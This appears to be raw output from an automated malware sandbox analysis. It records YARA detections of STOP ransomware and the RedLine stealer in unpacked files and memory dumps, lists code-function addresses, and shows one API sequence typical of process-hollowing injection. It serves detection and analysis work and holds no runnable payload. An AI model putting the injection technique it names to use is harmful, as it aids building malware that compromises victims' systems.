Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.file.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.file.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.file.exe.22f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.file.exe.22f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.file.exe.22c15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.file.exe.22c15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.1978609190.00000000020F6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1882592220.0000000002177000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.2056830480.00000000020FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000004.00000002.2105224464.0000000002148000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.1752159390.000000000210D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: Process Memory Space: file.exe PID: 6708, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: file.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: file.exe PID: 7164, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: file.exe PID: 5576, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: file.exe PID: 7060, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: file.exe PID: 5644, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: file.exe PID: 600, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: file.exe PID: 3512, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: file.exe PID: 5944, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: file.exe PID: 4904, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	0_2_021A0110
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	3_2_022F0110
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E0110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	4_2_021E0110

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402C73	0_2_00402C73
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A7220	0_2_021A7220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_022222C0	0_2_022222C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021EE37C	0_2_021EE37C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A7393	0_2_021A7393
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021AB000	0_2_021AB000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021BF030	0_2_021BF030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021AA026	0_2_021AA026
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021AB0B0	0_2_021AB0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021B00D0	0_2_021B00D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A30F0	0_2_021A30F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A70E0	0_2_021A70E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A9120	0_2_021A9120
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021EE141	0_2_021EE141
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021CD1A4	0_2_021CD1A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021EB69F	0_2_021EB69F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021AA699	0_2_021AA699
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021AE6E0	0_2_021AE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021AC760	0_2_021AC760
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021AA79A	0_2_021AA79A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021CD7F1	0_2_021CD7F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A3520	0_2_021A3520
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A7520	0_2_021A7520
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021ACA10	0_2_021ACA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A7A80	0_2_021A7A80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021B0B00	0_2_021B0B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A2B60	0_2_021A2B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021ADBE0	0_2_021ADBE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A7880	0_2_021A7880
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021C18D0	0_2_021C18D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021AA916	0_2_021AA916
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021CF9B0	0_2_021CF9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021CE9A3	0_2_021CE9A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A89D0	0_2_021A89D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A59F7	0_2_021A59F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A8E60	0_2_021A8E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021D4E9F	0_2_021D4E9F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021E2D1E	0_2_021E2D1E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A5DF7	0_2_021A5DF7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A5DE7	0_2_021A5DE7
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040D240	1_2_0040D240
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00419F90	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00405057	1_2_00405057
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040C070	1_2_0040C070
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0042E003	1_2_0042E003
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0042F010	1_2_0042F010
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00408030	1_2_00408030
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004070E0	1_2_004070E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00410160	1_2_00410160
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004C8113	1_2_004C8113
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004021C0	1_2_004021C0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004C9343	1_2_004C9343
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0044237E	1_2_0044237E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00405447	1_2_00405447
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00405457	1_2_00405457
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004084C0	1_2_004084C0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004344FF	1_2_004344FF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00449506	1_2_00449506
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0044B5B1	1_2_0044B5B1
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040A660	1_2_0040A660
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00409686	1_2_00409686
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0041E690	1_2_0041E690
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00406740	1_2_00406740
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00402750	1_2_00402750
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040A710	1_2_0040A710
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040F730	1_2_0040F730
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00408780	1_2_00408780
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0044D7A1	1_2_0044D7A1
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0042C804	1_2_0042C804
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00406880	1_2_00406880
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00481920	1_2_00481920
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0044D9DC	1_2_0044D9DC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004069F3	1_2_004069F3
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00449A71	1_2_00449A71
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00443B40	1_2_00443B40
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00402B80	1_2_00402B80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00406B80	1_2_00406B80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00409CF9	1_2_00409CF9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0044ACFF	1_2_0044ACFF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040DD40	1_2_0040DD40
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00427D6C	1_2_00427D6C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040BDC0	1_2_0040BDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00409DFA	1_2_00409DFA
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0042CE51	1_2_0042CE51
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00406EE0	1_2_00406EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00409F76	1_2_00409F76
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00420F30	1_2_00420F30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00449FE3	1_2_00449FE3
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00402C73	3_2_00402C73
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F7220	3_2_022F7220
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_023722C0	3_2_023722C0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0233E37C	3_2_0233E37C
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F7393	3_2_022F7393
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0230F030	3_2_0230F030
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022FA026	3_2_022FA026
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022FB000	3_2_022FB000
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022FB0B0	3_2_022FB0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F70E0	3_2_022F70E0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F30F0	3_2_022F30F0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_023000D0	3_2_023000D0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F9120	3_2_022F9120
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0233E141	3_2_0233E141
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0231D1A4	3_2_0231D1A4
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0233B69F	3_2_0233B69F
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022FA699	3_2_022FA699
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022FE6E0	3_2_022FE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022FC760	3_2_022FC760
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022FA79A	3_2_022FA79A
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0231D7F1	3_2_0231D7F1
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F3520	3_2_022F3520
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F7520	3_2_022F7520
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022FCA10	3_2_022FCA10
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F7A80	3_2_022F7A80
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_02300B00	3_2_02300B00
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F2B60	3_2_022F2B60
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022FDBE0	3_2_022FDBE0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F7880	3_2_022F7880
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_023118D0	3_2_023118D0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022FA916	3_2_022FA916
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0231F9B0	3_2_0231F9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0231E9A3	3_2_0231E9A3
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F59F7	3_2_022F59F7
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F89D0	3_2_022F89D0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F8E60	3_2_022F8E60
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_02324E9F	3_2_02324E9F
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_02332D1E	3_2_02332D1E
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F5DE7	3_2_022F5DE7
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F5DF7	3_2_022F5DF7
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E7220	4_2_021E7220
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_022622C0	4_2_022622C0
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_0222E37C	4_2_0222E37C
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E7393	4_2_021E7393
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021EB000	4_2_021EB000
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021FF030	4_2_021FF030
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021EA026	4_2_021EA026
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021EB0B0	4_2_021EB0B0
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021F00D0	4_2_021F00D0
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E30F0	4_2_021E30F0
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E70E0	4_2_021E70E0
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E9120	4_2_021E9120
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_0222E141	4_2_0222E141
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_0220D1A4	4_2_0220D1A4
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021EA699	4_2_021EA699
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_0222B69F	4_2_0222B69F
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021EE6E0	4_2_021EE6E0
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021EC760	4_2_021EC760
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021EA79A	4_2_021EA79A
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_0220D7F1	4_2_0220D7F1
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E3520	4_2_021E3520
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E7520	4_2_021E7520
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021ECA10	4_2_021ECA10
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E7A80	4_2_021E7A80
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021F0B00	4_2_021F0B00
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E2B60	4_2_021E2B60
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021EDBE0	4_2_021EDBE0
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E7880	4_2_021E7880
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_022018D0	4_2_022018D0
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021EA916	4_2_021EA916
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_0220E9A3	4_2_0220E9A3
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_0220F9B0	4_2_0220F9B0
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E89D0	4_2_021E89D0
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E59F7	4_2_021E59F7
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E8E60	4_2_021E8E60
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_02214E9F	4_2_02214E9F
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_02222D1E	4_2_02222D1E
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E5DF7	4_2_021E5DF7
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E5DE7	4_2_021E5DE7

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00428C81 appears 36 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00402668 appears 38 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 02320160 appears 49 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 004547A0 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 02318EC0 appears 57 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 021D0160 appears 49 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0042F7C0 appears 55 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0040323C appears 54 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 021C8EC0 appears 57 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0044F23E appears 53 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00428520 appears 67 times
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: String function: 02208EC0 appears 57 times
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: String function: 02210160 appears 49 times

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.file.exe.22315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.file.exe.22315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.file.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.file.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.file.exe.22c15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.file.exe.22c15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
